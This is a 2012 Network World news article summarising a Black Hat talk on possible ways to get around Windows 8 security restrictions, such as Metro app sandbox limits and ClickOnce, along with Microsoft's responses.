Skip Links

Black Hat: Researcher pinpoints promising ways to attack Windows 8

Windows 8 has soft spots where attackers could apply pressure, researcher says

By , Network World
July 27, 2012 04:04 PM ET
Sun-ting Tsai

Network World - Windows 8 offers some promising opportunities for attackers, but overall is a much more secure operating system than its predecessor, a researcher told the Black Hat conference.

There are at least three attack points in Windows 8 that with more work might yield vulnerabilities that could be exploited, says Sung-ting Tsai, leader of an advanced threat research team for Trend Micro, who was interviewed for this story after his Black Hat presentation.

WINDOWS 8 UPDATE: Desperate for developers?

LEARN: Why, when and how to migrate to Windows 8

IN PICTURES: Quirkiest moments at 2012 Black Hat security conference

But more promising are two methods of evading some security provisions Microsoft has put in place with its new operating system.

The first of these is getting around limitations placed on Windows 8 Metro style applications that prevent them from accessing the Internet. Rather than trying to break through that restriction, an application could instead access an application that has such permission.

 
Bullet Black Hat panel: Which do you trust less with your data, the U.S. government or Google?
Bullet Tatu Ylonen, father of SSH, says security is 'getting worse'
Bullet Researcher wows Black Hat with NFC-based smartphone hacking demo
Bullet Black Hat: Cyber-espionage operations vast yet highly focused, researcher claims

 

So an application that lacks an Internet permission could still send messages to the Internet via Internet Explorer or Microsoft Media Server and append local information to the URL that IE or MMS is instructed to seek, he says. Similarly, a Word or Excel file that the Metro app accesses could contain code to connect the Internet.

With Internet access, a rogue app could upload data from the local machine to a machine on the Internet controlled by an attacker.

Microsoft says it won't do anything about this, according to the company response Tsai includes in his Black Hat presentation. That's because accessing the Internet would be visible to users, who could stop it if they disapproved. Similarly, antivirus products could catch such access. Once this type of activity is reported to Microsoft, it could remove the app from user machines.

Tsai says he disagrees. When the average user sees a Metro app launch MMS, it won't raise suspicion that the application is trying to access the Internet, he says. But even if the user is aware, it is difficult to determine whether the access is normal or malicious behavior. Antivirus software would have similar difficulty telling the difference, he says.

Another possible evasion calls for using the command prompt cmd.exe from within the application container sandbox to trigger other executables outside, Tsai says.

Microsoft says this is not a problem and Tsai agrees. But he says that it is possible that in conjunction with other executables, it could potentially exploit other vulnerabilities.

He also looks at ClickOnce, the installation package running on Windows 8. It is possible to get it to launch files to the file system that could be harmful. Tsai says Microsoft agrees and will fix it in the next release of Windows 8.

Our Commenting Policies
Latest News
rssRss Feed
View more Latest News